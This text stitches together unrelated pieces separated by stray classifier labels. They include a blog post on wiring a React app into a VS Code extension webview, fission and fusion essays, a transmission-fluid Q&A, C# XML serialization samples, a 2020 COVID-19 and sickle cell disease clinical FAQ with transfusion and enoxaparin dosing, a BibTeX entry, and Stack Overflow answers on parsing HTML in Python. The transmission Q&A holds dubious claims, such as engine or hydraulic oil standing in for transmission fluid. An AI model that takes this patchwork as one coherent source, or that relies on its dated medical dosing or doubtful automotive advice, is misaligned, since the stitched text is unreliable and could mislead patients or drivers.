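The same relationships govern the parametric frequency converters described above; the converter simply takes one of the sideband frequencies as its output instead of reapplying it to the varactor.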
Building a VSCode Extension: Part Three
Corey O'Donnell · 8 min read

Now that I have a blank VS Code extension set up and working, I want to start building on it.

Adding some Code formatting configs

The Yeoman template for VS Code Extension does not have any formatting configs that I typically use for my projects. I make sure to always have an .editorconfig file. EditorConfig is used to help maintain consistent coding styles for whitespace across everyone's text editors and IDEs. Here is an example I typically use on my TypeScript projects.

# .editorconfig
# top-most EditorConfig file
root = true

# Unix-style newlines with a newline ending every file
[*]
end_of_line = lf
insert_final_newline = true
trim_trailing_whitespace = true

# Matches multiple files with brace expansion notation
# Set default charset
[*.{js,jsx,ts,tsx}]
charset = utf-8
indent_style = space
indent_size = 4

# Matches the exact files either package.json or .travis.yml
[package.json]
indent_style = space
indent_size = 2

Prettier adds even more code formatting. It really helps create a consistent code style. Every developer has a different way of implementing code. Having a consistent style is important for open source. Here is the .prettierrc config I am using for my extension.

{
    "printWidth": 160,
    "trailingComma": "none",
    "tabWidth": 4,
    "useTabs": false,
    "semi": true,
    "singleQuote": true,
    "jsxSingleQuote": true,
    "bracketSpacing": true
}

I work on multiple projects that all require a different node version. I use NVM along with AVN to auto-switch my node version depending on which repository I am in. Example .node-version file used in this repository:

v12.18.3

With some consistency added to the code base, it's time to work on the react app.

Bootstrapping React

Creating a brand new react app is fairly simple using the create-react-app tool. I knew I wanted the app in a subdirectory called webview in my extension. First I navigated to the src directory and then used create-react-app to set up an empty react app. I used the typescript template since I wanted this entire extension using typescript, including the react portion.

cd src/
npx create-react-app webview --template typescript

Now I just wanted to verify everything was set up and working.

cd webview/
npm run start

It failed with this error...

There might be a problem with the project dependency tree. It is likely not a bug in Create React App, but something you need to fix locally.

The react-scripts package provided by Create React App requires a dependency:

  "eslint": "^6.6.0"

Don't try to install it manually: your package manager does it automatically. However, a different version of eslint was detected higher up in the tree:

  /home/CodeByCorey/workspace/vscode-todo-task-manager/node_modules/eslint (version: 7.7.0)

Manually installing incompatible versions is known to cause hard-to-debug issues.

If you would prefer to ignore this check, add SKIP_PREFLIGHT_CHECK=true to an .env file in your project. That will permanently disable this message but you might encounter other issues.

To fix the dependency tree, try following the steps below in the exact order:

1. Delete package-lock.json (not package.json!) and/or yarn.lock in your project folder.
2. Delete node_modules in your project folder.
3. Remove "eslint" from dependencies and/or devDependencies in the package.json file in your project folder.
4. Run npm install or yarn, depending on the package manager you use.

In most cases, this should be enough to fix the problem.
If this has not helped, there are a few other things you can try:

5. If you used npm, install yarn (http://yarnpkg.com/) and repeat the above steps with it instead. This may help because npm has known issues with package hoisting which may get resolved in future versions.
6. Check if /home/CodeByCorey/workspace/vscode-todo-task-manager/node_modules/eslint is outside your project directory. For example, you might have accidentally installed something in your home folder.
7. Try running npm ls eslint in your project folder. This will tell you which other package (apart from the expected react-scripts) installed eslint.

If nothing else helps, add SKIP_PREFLIGHT_CHECK=true to an .env file in your project. That would permanently disable this preflight check in case you want to proceed anyway.

P.S. We know this message is long but please read the steps above :-) We hope you find them helpful!

I looked in the root package.json for my VS Code extension and it is using eslint@7, and react-scripts requires eslint@6. Due to how yarn/npm handles packages, my react app was not installing eslint at v6 because yarn already saw it installed at v7 at the root of the project. The easiest solution I used was to downgrade my extension's eslint version on my root project.

# navigate back to the root of the project
cd ../../
yarn add -D eslint@6
cd src/webview
yarn start

Boom! It worked and opened my app in the browser at http://localhost:3000

I moved the extension.ts into its own directory to help keep the webview and extension separate.

mkdir -p src/extension
mv src/extension.ts src/extension/extension.ts

and changed the main key on the package.json to use the new folder structure

"main": "./dist/extension/extension.js"

How do I get VS Code to open it??

The react app is working in my browser, but how do I make VS Code display it? First thing I did was add the VS Code commands that would open the react app inside package.json

"activationEvents": [
    "onCommand:vscode-task-manager.openTodoManager"
],
"contributes": {
    "commands": [
        {
            "command": "vscode-task-manager.openTodoManager",
            "title": "Todo Manager"
        }
    ]
}

Inside extension.ts I replaced the helloWorld command with my new command. Using the Webview docs I figured out how to open a panel with HTML.

import * as vscode from 'vscode';

export function activate(context: vscode.ExtensionContext) {
    context.subscriptions.push(
        vscode.commands.registerCommand('vscode-task-manager.openTodoManager', () => {
            // Create and show panel
            const panel = vscode.window.createWebviewPanel('todoManager', 'Todo Manager', vscode.ViewColumn.One, { enableScripts: true });

            // And set its HTML content
            panel.webview.html = getWebviewContent();
        })
    );
}

function getWebviewContent() {
    return `
        <!DOCTYPE html>
        <html lang="en">
        <head>
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>Todo Task Manager</title>
        </head>
        <body>
            <h1>Hello TODO</h1>
        </body>
        </html>
    `;
}

When you run the extension and trigger the Todo Manager command, it should open a new panel that displays Hello TODO.

Now let's figure out how to get my react resources loaded into the HTML. I need to move my React app's compiled code into the dist directory for my extension to use. I created an npm script inside my react project to move the folder after it's finished building, using postbuild.

"scripts": {
    "start": "react-scripts start",
    "build": "react-scripts build",
    "postbuild": "rimraf ../../dist/webview && mv build ../../dist/webview",
    "test": "react-scripts test",
    "eject": "react-scripts eject"
}

The location of the extension's files on the file system is conveniently attached to the context parameter on the activate function. I passed the object to my getWebviewContent() function where I plan to fetch all the react resources. React is nice enough to offer an asset-manifest.json to find out the name of all the compiled assets. Using path, context.extensionPath, and vscode.Uri, we can map out the physical location of the compiled react scripts and import them into the HTML with VS Code's resource tags.

function getWebviewContent(context: vscode.ExtensionContext): string {
    const { extensionPath } = context;
    const webviewPath: string = path.join(extensionPath, 'dist', 'webview');
    const assetManifest: AssetManifest = require(path.join(webviewPath, 'asset-manifest.json'));

    const main: string = assetManifest.files['main.js'];
    const styles: string = assetManifest.files['main.css'];
    const runTime: string = assetManifest.files['runtime-main.js'];
    const chunk: string = Object.keys(assetManifest.files).find((key) => key.endsWith('chunk.js')) as string;

    const mainUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, main)).with({ scheme: 'vscode-resource' });
    const stylesUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, styles)).with({ scheme: 'vscode-resource' });
    const runTimeMainUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, runTime)).with({ scheme: 'vscode-resource' });
    const chunkUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, chunk)).with({ scheme: 'vscode-resource' });

    return `
        <!DOCTYPE html>
        <html lang="en">
        <head>
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>Todo Task Manager</title>
            <link rel="stylesheet" type="text/css" href="${stylesUri.toString(true)}">
        </head>
        <body>
            <div id="root"></div>
            <script crossorigin="anonymous" src="${runTimeMainUri.toString(true)}"></script>
            <script crossorigin="anonymous" src="${chunkUri.toString(true)}"></script>
            <script crossorigin="anonymous" src="${mainUri.toString(true)}"></script>
        </body>
        </html>
    `;
}

Now when I run the debugger for my extension and trigger the Todo Manager command, the React app appears as a VS Code panel!

Issues and concerns with the current implementation

I am not 100% happy with this solution. I am not a fan of a sub npm package and managing the react build separately from the extension. A great example of why I dislike it is the eslint issue I didn't expect to happen. I also dislike how I have to compile the react app separately and then compile the extension to make it work. I need to work on my npm scripts to make it more seamless. One benefit of treating it like a separate app is I can run react in my browser to quickly develop the front end portion and then test it out as a webview panel later. This is all just a proof of concept for now. There is a more official way to implement web views that I plan on using now that I know it works.

Next steps

I need to figure out how to make the react app and the extension communicate with each other. I have seen some existing open source projects using RPC (not sure what that is), but I have also seen some using a postMessage() && onMessage() method (see the rough sketch at the end of this post). Over the next couple of days, I'll be investigating what I can do and document my efforts.

I also want a more trendy name.
Todo Task Manager is just not sitting well with me.
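For anyone curious about that postMessage() idea, here is a rough sketch of what it might look like. This is not part of the project yet; the command names and message shapes below are made up for illustration, but webview.postMessage, webview.onDidReceiveMessage, and acquireVsCodeApi are the standard VS Code webview APIs.

// extension side (src/extension/extension.ts), after creating the panel
panel.webview.onDidReceiveMessage((message) => {
    // hypothetical message shape: { command: string; payload?: unknown }
    if (message.command === 'webview-ready') {
        // reply to the react app with some data
        panel.webview.postMessage({ command: 'load-todos', payload: [] });
    }
});

// react side (e.g. src/webview/src/App.tsx)
// acquireVsCodeApi() is injected into the webview by VS Code at runtime
declare function acquireVsCodeApi(): { postMessage(message: unknown): void };
const vscodeApi = acquireVsCodeApi();

// tell the extension the webview has mounted
vscodeApi.postMessage({ command: 'webview-ready' });

// listen for messages sent back from the extension
window.addEventListener('message', (event) => {
    const message = event.data; // the object passed to panel.webview.postMessage
    if (message.command === 'load-todos') {
        // update react state with message.payload here
    }
});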
Fission and Fusion

Fission Essay

Fission is the act or process of splitting into two parts. It is also a nuclear reaction in which an atomic nucleus splits into fragments, releasing from 100 million to several hundred million electron volts of energy. An atom contains protons and neutrons in its central nucleus. In fission, the nucleus splits, either through radioactive decay or because it has been bombarded by other subatomic particles, known as neutrons. The resulting pieces have less combined mass than the original nucleus, with the missing mass converted into nuclear energy. Controlled fission occurs when a neutron bombards the nucleus of an atom, breaking it into two smaller nuclei. The split releases a significant amount of energy, on the order of 200 million electron volts, as well as at least two more neutrons. Controlled reactions of this sort are used to release energy within nuclear power plants. Uncontrolled reactions can fuel nuclear weapons. Radioactive decay, where the nucleus of a heavy element spontaneously emits a charged particle as it breaks down into a smaller nucleus, is another path; this does not occur often and happens only with the heavier elements.

Fusion Essay

Fusion is the reaction in which two atoms of hydrogen combine to form an atom of helium. In the process some of the mass of the hydrogen is converted into energy. The easiest fusion reaction to make happen is combining deuterium (or "heavy hydrogen") with tritium (or "heavy-heavy hydrogen") to make helium and a neutron. Deuterium is plentifully available in ordinary water. Tritium can be produced by combining the fusion neutron with the abundant light metal lithium. Thus fusion has the potential to be an inexhaustible source of energy. To make fusion happen, the atoms of hydrogen must be heated to very high temperatures so they are ionized, forming a plasma, and have sufficient energy to fuse, and then be held together long...
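For reference, the deuterium-tritium reaction described in the fusion essay can be written out as a worked equation (this line is a clarifying addition, not part of the original essay):

    D + T -> He-4 + n + about 17.6 MeV

That is, a deuterium nucleus (one proton, one neutron) and a tritium nucleus (one proton, two neutrons) fuse into a helium-4 nucleus plus a free neutron, and the small amount of mass lost in the process appears as energy in accordance with E = mc^2.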
Can you add transmission fluid yourself?

You can add more by inserting a funnel into the tube the dipstick was withdrawn from and pouring a small amount of automatic transmission fluid into the pipe. Check the level each time you add a little until the level is right between the two lines.

Can I just add transmission fluid without changing it?

Most service centers and shops do not charge any more or less to flush or change your transmission fluid than an oil change. However, like oil changes, you can even do this yourself. … The old fluid will contaminate the new fluid you introduce. That last part is why flushing the fluid is the best way to deal with this.

What are the symptoms of low transmission fluid?

Signs of Low Transmission Fluid
• Noises. If your transmission is working properly, you shouldn't hear any noise while you're driving, as it should transition smoothly. …
• Burning Smell. Any foul smell coming from your car should direct you to your nearest service center. …
• Transmission Leaks. …
• Slipping Gears.

Can you fill transmission fluid through the dipstick?

Observe the markings at the end of the dipstick. Your dipstick might have two markings for "full"—one warm, one cold. If the automatic transmission fluid level does not come up to the "warm" line, you'll need to add automatic transmission fluid. Insert a long funnel into the automatic transmission fluid dipstick hole.

Can you mix old and new transmission fluid?

You should not mix the old transmission fluid with a new one. The main reason is it won't offer you the ideal viscosity. At the same time, the mixing will reduce the performance of the transmission system. So it will affect overall engine performance.

What can I use if I don't have transmission fluid?

Any lightweight, quality engine oil or hydraulic fluid will work: 5 to 10 single weight, or multi-weight 5W-30 or 10W-30.

What happens if you drive with low transmission fluid?

Driving your car with a low transmission fluid level is dangerous to you and the vehicle. Failure to top up the fluid is a hazard that might cause extreme damage to the transmission, the engine, and essential components that keep the car running.

How long should I let my car run before checking the transmission fluid?

1) Prepare the Vehicle. Set the parking brake and start the engine. Let it run for about 5 minutes so that it can warm up. Some car manufacturers will recommend you turn the engine off before checking the transmission fluid, but most don't recommend this.

What happens if you put too much transmission fluid in your car?

If you add too much transmission fluid, you will notice that it may foam, and that can bring about erratic gear shifting. Some other problems that may arise include oil starvation and transmission damage. … Adding too much transmission fluid can also cause early failure and damage of parts as a result of excess pressure.

What happens if you overfill transmission fluid?

If you overfill it, the transmission will experience hard shifting and slippage. Another consequence of overfilling your transmission is that it will cause the fluid to lose its lubricating properties. It could also lead to the entire system blowing up and not functioning.

Is it OK to mix transmission fluid brands?

Yes. Synthetic ATF and conventional fluids are 100 percent compatible with each other.

What does black transmission fluid mean?
Nearly black or black transmission fluid means the fluid is old, very dirty, contaminated, and if paired with a burnt toast smell, has oxidized. At this point, your transmission is telling you something is wrong. If your transmission is showing signs of slipping or hesitation, repair or replacement may be in order.
Example #1

/// <summary>
/// Here is the actual save method. The element should be an already created one.
/// </summary>
/// <param name="doc">Owner XML document used to create nodes and attributes</param>
/// <param name="element">Existing element that receives the item's data</param>
public virtual void SaveItem(XmlDocument doc, System.Xml.XmlElement element)
{
    UnitsManager unitMng = new UnitsManager();

    // save name attribute
    XmlAttribute attr = doc.CreateAttribute("Name");
    attr.Value = Name;
    element.SetAttributeNode(attr);

    // save location
    XmlElement el = doc.CreateElement("Location");
    attr = doc.CreateAttribute("PositionX");
    attr.Value = LocationInUnitsX.ToString() + unitMng.UnitToString(MeasureUnit);
    el.SetAttributeNode(attr);
    attr = doc.CreateAttribute("PositionY");
    attr.Value = LocationInUnitsY.ToString() + unitMng.UnitToString(MeasureUnit);
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    // save Width and Height. This is the same as the shape, but the generator wants this information as well
    el = doc.CreateElement("Width");
    attr = doc.CreateAttribute("Value");
    attr.Value = this.WidthInUnits.ToString() + unitMng.UnitToString(MeasureUnit);
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    el = doc.CreateElement("Height");
    attr = doc.CreateAttribute("Value");
    attr.Value = this.HeightInUnits.ToString() + unitMng.UnitToString(MeasureUnit);
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    el = doc.CreateElement("WidthInPixels");
    attr = doc.CreateAttribute("Value");
    attr.Value = this.WidthInPixels.ToString();
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    el = doc.CreateElement("HeightInPixels");
    attr = doc.CreateAttribute("Value");
    attr.Value = this.HeightInPixels.ToString();
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    // save Shape
    el = doc.CreateElement("Shape");
    attr = doc.CreateAttribute("Type");
    attr.Value = "Rectangle";
    el.SetAttributeNode(attr);
    XmlElement el2 = doc.CreateElement("Dimensions");
    attr = doc.CreateAttribute("Width");
    attr.Value = this.WidthInUnits.ToString() + unitMng.UnitToString(MeasureUnit);
    el2.SetAttributeNode(attr);
    el.AppendChild(el2);
    attr = doc.CreateAttribute("Height");
    attr.Value = this.HeightInUnits.ToString() + unitMng.UnitToString(MeasureUnit);
    el2.SetAttributeNode(attr);
    el.AppendChild(el2); // re-appending the same node is effectively a no-op; kept as in the original sample
    element.AppendChild(el);

    // save Scale
    el = doc.CreateElement("Scale");
    attr = doc.CreateAttribute("x");
    attr.Value = this.ScaleXFactor.ToString();
    el.SetAttributeNode(attr);
    attr = doc.CreateAttribute("y");
    attr.Value = this.ScaleXFactor.ToString(); // NOTE: the original sample reuses ScaleXFactor here; a Y scale factor is presumably intended
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    // save transformations
    el = doc.CreateElement("Transformation");
    attr = doc.CreateAttribute("a");
    attr.Value = this.TransformationMatrix.Elements[0].ToString();
    el.SetAttributeNode(attr);
    attr = doc.CreateAttribute("b");
    attr.Value = this.TransformationMatrix.Elements[1].ToString();
    el.SetAttributeNode(attr);
    attr = doc.CreateAttribute("c");
    attr.Value = this.TransformationMatrix.Elements[2].ToString();
    el.SetAttributeNode(attr);
    attr = doc.CreateAttribute("d");
    attr.Value = this.TransformationMatrix.Elements[3].ToString();
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    // save rotation
    el = doc.CreateElement("Rotation");
    attr = doc.CreateAttribute("Value");
    attr.Value = this.RotationAngle.ToString();
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    // save dock position
    el = doc.CreateElement("DockPosition");
    attr = doc.CreateAttribute("Dock");
    attr.Value = this.DockPositionString;
    el.SetAttributeNode(attr);
    element.AppendChild(el);

    // save anchor properties
    if (anchor != null)
    {
        el = doc.CreateElement("Anchor");
        attr = doc.CreateAttribute("Top");
        attr.Value = this.anchor.TopAnchor.ToString();
        el.SetAttributeNode(attr);
        attr = doc.CreateAttribute("Bottom");
        attr.Value = this.anchor.Bottomanchor.ToString();
        el.SetAttributeNode(attr);
        attr = doc.CreateAttribute("Left");
        attr.Value = this.anchor.LeftAnchor.ToString();
        el.SetAttributeNode(attr);
        attr = doc.CreateAttribute("Right");
        attr.Value = this.anchor.RightAnchor.ToString();
        el.SetAttributeNode(attr);
        element.AppendChild(el);
    }
}

Example #2

/// <summary>
/// Set the handle attribute on the given node.
/// </summary>
/// <param name="oNode">Element that receives the handle attribute</param>
/// <param name="strHandle">Handle value; ignored when null or empty</param>
private void SetHandle(System.Xml.XmlElement oNode, string strHandle)
{
    if (strHandle != null && strHandle.Length != 0)
    {
        System.Xml.XmlAttribute hAttr;
        hAttr = oNode.OwnerDocument.CreateAttribute(Constant.Attribute.HANDLE_ATTR);
        hAttr.Value = strHandle;
        oNode.SetAttributeNode(hAttr);
    }
}
COVID-19 and Sickle Cell Disease: Frequently Asked Questions

(Version 4.0; last updated June 18, 2020)

Input from Drs. Arun Shet, Ken Ataga, Ted Wun, Matthew Hseih, Allison King, Rakhi Naik, Alexis Thompson, and Michael DeBaun

Note: Please review ASH's disclaimer regarding the use of the following information.

How do people with sickle cell disease (SCD) do with COVID-19?

Patients with SCD often have underlying cardiopulmonary co-morbidities that may predispose them to poor outcomes if they become infected with SARS-CoV-2. Data are being collected by the international COVID-19 sickle cell disease registry and by the ASH Registry, and providers are encouraged to report their SCD patients with COVID-19. The Sickle Cell Disease Association of America updates its recommendations frequently about best practices for the care of SCD patients in the era of COVID-19. Below, we address FAQs that arise most commonly from providers less familiar with SCD.

How should I evaluate respiratory symptoms in children and adults with an active COVID-19 infection?

There is significant overlap in presenting symptoms between COVID-19, acute chest syndrome (ACS) and other infectious causes of pneumonia. Providers should test for COVID-19 and other infectious pathogens and have a low threshold for imaging. COVID-19 most commonly presents with a more diffuse ground-glass appearance, versus more localized infiltrates consistent with pneumonia or ACS. These findings are not always distinct, and all possibilities should remain in the differential. A detailed checklist for evaluating SCD patients with these symptoms in the emergency department has been developed by ASH in collaboration with ED physicians. Often transfusion therapy is the only effective therapy for respiratory failure due to ACS, with a goal to reduce the hemoglobin S (HbS) level to approximately 15% via exchange transfusion, in order to ensure that HbS levels remain less than 30% for approximately 4 weeks. Post automated exchange transfusion, the hemoglobin should be targeted between 10 and 12 g/dL to maximize oxygen-carrying capacity. Whether reducing HbS via transfusion improves outcome in COVID-19 respiratory failure is unknown, but decreased sickling in this setting, as in ACS, is desirable. Transfer to another facility should be strongly considered early after presentation if automated exchange transfusion therapy cannot be performed. Simple transfusion can be given in the interim, with avoidance of hyperviscosity by targeting a post-infusion Hb of less than 10 g/dL.

Should I change my use of exchange transfusion for acute neurological symptoms suggesting a stroke or transient ischemic attack?

For acute stroke presentation or transient ischemic attack (TIA), we recommend reducing the percent HbS level to approximately 15% via exchange transfusion. This strategy provides sustained HbS levels less than 30% for approximately 4 weeks and is consistent with the ASH CNS guidelines recommendations for management of acute strokes and TIAs. Early reduction in HbS has been associated with better outcomes after stroke. Simple transfusion can be given while preparing for exchange transfusion, with avoidance of hyperviscosity by targeting a post-infusion Hb less than 10 g/dL.

Should I change my use of exchange transfusion or regular blood transfusion for primary and secondary stroke prevention, secondary prevention of ACS, pain or priapism?
At present, transfusion practices in children and adults with SCD are being modified on a case-by-case basis as determined by individual physicians and practice groups. Some providers are electing to relax exchange transfusion endpoints (i.e. allowing 40% HbS) or switching to simple exchange transfusion (for an interim period) to minimize unit consumption. In areas where severe blood shortages are expected or already occurring, some providers are initiating hydroxyurea in patients on routine blood transfusions because the transition to maximum tolerated dose of hydroxyurea may require up to 6 months to be fully effective. Based on the efficacy of hydroxyurea for primary and secondary stroke prevention as compared to no red blood cell transfusion, we would consider starting low-dose hydroxyurea in children with an indication for primary or secondary stroke prevention, if blood transfusion services are likely to be interrupted [1], after discussion with the family and transfusion service personnel. Randomized controlled trial data are not available, but a similar strategy for secondary prevention of stroke is also reasonable for adults. The evidence for transfusions as secondary prevention of ACS, pain and priapism has not been evaluated prospectively in randomized controlled trials, but rather analyzed post hoc from stroke prevention studies. Collectively, these data, along with extensive clinical experience, suggest that regular blood transfusions do decrease the incidence of acute chest syndrome, acute pain and priapism events, and thus transfusion therapy should be continued on an individualized basis if possible for these indications. Should we alter approaches to transfusion thresholds and blood use in children and adults with SCD? The transfusion threshold for common clinical situations (i.e., severe anemia, VOC, priapism, etc.) may need adjustment due to blood shortages. Transfusions should be given for symptoms arising from severe anemia or acute complications (e.g. ACS or stroke), and not solely based on preestablished hemoglobin thresholds. How should one balance risk of hospitalization for acute painful vaso-occlusive episode management vs. risk of exposure to COVID-19? Where possible, consider telemedicine patient contact and optimize the use of oral opioids. To limit exposure to COVID-19, shift as many patients as feasible to receive intravenous narcotics in a day hospital, if available, rather than the emergency department. Minimizing provider cross coverage between outpatient/day hospital and inpatient units is desirable. Should a child or adult with severe COVID-19 infection receive therapeutic anticoagulation? No, they should receive only prophylactic doses, or “intermediate intensity” dosing (0.5 mg/kg enoxaparin twice daily) per institutional ICU practice or as part of a clinical trial, unless there is an indication for full anticoagulation [2]. For additional details, please see the COVID-19 VTE/anticoagulation FAQs. Is there any specific guidance you are giving patients who are considering stem cell transplantation or gene therapy for SCD? Many programs are preparing to resume non-emergent treatments including transplantation and gene therapies for SCD. Individuals should contact their primary hematologist or transplant center for updates. My patient usually receives antigen-matched red cells. Should I use non-matched units if there is a blood shortage?
If possible, continue to transfuse antigen-matched units to prevent alloimmunization, unless blood transfusion is life-saving and time-sensitive and matched units are not immediately available. For patients with a history of delayed hemolytic transfusion reactions (DHTR), at a minimum the minor red cell antigens should be matched for Rh (C, E or C/c, E/e), and K, and should lack any antigens identified in the DHTR evaluation. Additional matching should be considered for Jka/Jkb, Fya/Fyb, and S/s. A conversation with the local or regional blood bank personnel should occur to optimize the best potentially matched units. Immunosuppressive therapy should be considered on a case-by-case basis for DHTR. In patients with a history of hyperhemolysis, prophylactic immunosuppressive therapy is advised. For more information on transfusion management, see the ASH transfusion guidelines in SCD. Should I adjust doses of any SCD medications given the COVID-19 threat? If a patient is doing well, there is no reason to change any SCD medications because of the COVID-19 pandemic or actual infection. If COVID-19 rates remain high in your area, to reduce the frequency of clinic and pharmacy visits, consider telemedicine visits and increasing the supply of medication to 90 days as allowed. What is the role of recently approved disease-modifying drugs, voxelotor and crizanlizumab, during the COVID-19 pandemic? Patients on these medications should continue them. For patients with symptomatic baseline low hemoglobin levels or patients who are difficult to transfuse because of alloantibodies, voxelotor, a therapy designed to increase the baseline hemoglobin level, can be considered. The decision to begin this agent should be based on the relative benefits versus the risks and the likelihood of a limited blood supply. References 1. DeBaun, M. Initiating adjunct low-dose hydroxyurea therapy for stroke prevention in children with SCA during the COVID-19 pandemic. In press, Blood 2020. 2. Connors, J and Levy, J. COVID-19 and its implications for thrombosis and anticoagulation. Blood 2020. For additional information, see: View All COVID-19 FAQs
__label__pos
0.987818
@article{Sasaki2909,
  author = {Sasaki, T and Kaibuchi, K and Kabcenell, A K and Novick, P J and Takai, Y},
  title = {A mammalian inhibitory GDP/GTP exchange protein (GDP dissociation inhibitor) for smg p25A is active on the yeast SEC4 protein.},
  volume = {11},
  number = {5},
  pages = {2909--2912},
  year = {1991},
  doi = {10.1128/MCB.11.5.2909},
  publisher = {American Society for Microbiology Journals},
  abstract = {Evidence is accumulating that smg p25A, a small GTP-binding protein, may be involved in the regulated secretory processes of mammalian cells. The SEC4 protein is known to be required for constitutive secretion in yeast cells. We show here that the mammalian GDP dissociation inhibitor (GDI), which was identified by its action on smg p25A, is active on the yeast SEC4 protein in inhibiting the GDP/GTP exchange reaction and is capable of forming a complex with the GDP-bound form of the SEC4 protein but not with the GTP-bound form. These results together with our previous findings that smg p25A GDI is found in mammalian cells with both regulated and constitutive secretion types suggest that smg p25A GDI plays a role in both regulated and constitutive secretory processes, although smg p25A itself may be involved only in regulated secretory processes. These results also suggest that a GDI for the SEC4 protein is present in yeast cells.},
  issn = {0270-7306},
  URL = {https://mcb.asm.org/content/11/5/2909},
  eprint = {https://mcb.asm.org/content/11/5/2909.full.pdf},
  journal = {Molecular and Cellular Biology}
}
__label__pos
0.953216
I want to grab the value of a hidden input field in HTML.

<input type="hidden" name="fooId" value="12-3456789-1111111111" />

I want to write a regular expression in Python that will return the value of fooId, given that I know the line in the HTML follows the format

<input type="hidden" name="fooId" value="**[id is here]**" />

Can someone provide an example in Python to parse the HTML for the value?

Accepted answer: For this particular case, BeautifulSoup is harder to write than a regex, but it is much more robust... I'm just contributing with the BeautifulSoup example, given that you already know which regexp to use :-)

from BeautifulSoup import BeautifulSoup

#Or retrieve it from the web, etc.
html_data = open('/yourwebsite/page.html','r').read()

#Create the soup object from the HTML data
soup = BeautifulSoup(html_data)
fooId = soup.find('input',name='fooId',type='hidden') #Find the proper tag
value = fooId.attrs[2][1] #The value of the third attribute of the desired tag
#or index it directly via fooId['value']

I think that the "new" keyword is a mismatch. – Andrea Francia May 12 '11 at 13:27

I agree with Vinko, BeautifulSoup is the way to go. However I suggest using fooId['value'] to get the attribute rather than relying on value being the third attribute.

from BeautifulSoup import BeautifulSoup

#Or retrieve it from the web, etc.
html_data = open('/yourwebsite/page.html','r').read()

#Create the soup object from the HTML data
soup = BeautifulSoup(html_data)
fooId = soup.find('input',name='fooId',type='hidden') #Find the proper tag
value = fooId['value'] #The value attribute

'new' ? That's not python! – habnabit Jan 27 '09 at 2:58

import re
reg = re.compile('<input type="hidden" name="([^"]*)" value="<id>" />')
value = reg.search(inputHTML).group(1)
print 'Value is', value

Parsing is one of those areas where you really don't want to roll your own if you can avoid it, as you'll be chasing down the edge-cases and bugs for years to come. I'd recommend using BeautifulSoup. It has a very good reputation and looks from the docs like it's pretty easy to use.

I agree for a general case, but if you're doing a one-off script to parse one or two very specific things out, a regex can just make life easier. Obviously more fragile, but if maintainability is a non-issue then it's not a concern. That said, BeautifulSoup is fantastic. – Cody Brocious Sep 10 '08 at 22:13

I love regex, but have to agree with Orion on this one. This is one of the times when the famous quote from Jamie Zawinski comes to mind: "Now you have two problems" – Justin Standard Sep 10 '08 at 22:29

Pyparsing is a good interim step between BeautifulSoup and regex. It is more robust than just regexes, since its HTML tag parsing comprehends variations in case, whitespace, attribute presence/absence/order, but simpler to do this kind of basic tag extraction than using BS. Your example is especially simple, since everything you are looking for is in the attributes of the opening "input" tag.
Here is a pyparsing example showing several variations on your input tag that would give regexes fits, and also shows how NOT to match a tag if it is within a comment:

html = """<html><body>
<input type="hidden" name="fooId" value="**[id is here]**" />
<blah>
<input name="fooId" type="hidden" value="**[id is here too]**" />
<input NAME="fooId" type="hidden" value="**[id is HERE too]**" />
<INPUT NAME="fooId" type="hidden" value="**[and id is even here TOO]**" />
<!-- <input type="hidden" name="fooId" value="**[don't report this id]**" /> -->
<foo>
</body></html>"""

from pyparsing import makeHTMLTags, withAttribute, htmlComment

# use makeHTMLTags to create tag expression - makeHTMLTags returns expressions for
# opening and closing tags, we're only interested in the opening tag
inputTag = makeHTMLTags("input")[0]

# only want input tags with special attributes
inputTag.setParseAction(withAttribute(type="hidden", name="fooId"))

# don't report tags that are commented out
inputTag.ignore(htmlComment)

# use searchString to skip through the input
foundTags = inputTag.searchString(html)

# dump out first result to show all returned tags and attributes
print foundTags[0].dump()
print

# print out the value attribute for all matched tags
for inpTag in foundTags:
    print inpTag.value

Prints:

['input', ['type', 'hidden'], ['name', 'fooId'], ['value', '**[id is here]**'], True]
- empty: True
- name: fooId
- startInput: ['input', ['type', 'hidden'], ['name', 'fooId'], ['value', '**[id is here]**'], True]
  - empty: True
  - name: fooId
  - type: hidden
  - value: **[id is here]**
- type: hidden
- value: **[id is here]**

**[id is here]**
**[id is here too]**
**[id is HERE too]**
**[and id is even here TOO]**

You can see that not only does pyparsing match these unpredictable variations, it returns the data in an object that makes it easy to read out the individual tag attributes and their values.

/<input type="hidden" name="fooId" value="([\d-]+)" \/>/

/<input\s+type="hidden"\s+name="([A-Za-z0-9_]+)"\s+value="([A-Za-z0-9_\-]*)"\s*/>/

>>> import re
>>> s = '<input type="hidden" name="fooId" value="12-3456789-1111111111" />'
>>> re.match('<input\s+type="hidden"\s+name="([A-Za-z0-9_]+)"\s+value="([A-Za-z0-9_\-]*)"\s*/>', s).groups()
('fooId', '12-3456789-1111111111')
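For readers without BeautifulSoup or pyparsing installed, a similar extraction can be sketched with nothing but Python 3's standard-library html.parser module. This is only an illustrative sketch, not one of the original answers: the field name "fooId" comes from the question, while the class name and the sample HTML string are made up for the example.

from html.parser import HTMLParser

class HiddenInputFinder(HTMLParser):
    """Collects the value attribute of the matching hidden <input> tag."""
    def __init__(self, wanted_name):
        super().__init__()
        self.wanted_name = wanted_name
        self.value = None

    def handle_starttag(self, tag, attrs):
        # attrs arrives as a list of (attribute, value) pairs for the opening tag
        attrs = dict(attrs)
        if (tag == "input" and attrs.get("type") == "hidden"
                and attrs.get("name") == self.wanted_name):
            self.value = attrs.get("value")

html_data = '<input type="hidden" name="fooId" value="12-3456789-1111111111" />'
parser = HiddenInputFinder("fooId")
parser.feed(html_data)
print(parser.value)  # 12-3456789-1111111111

Like the BeautifulSoup answers above, this reads the attribute by name rather than by position, so it keeps working if the attribute order in the page changes.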
__label__pos
0.908474
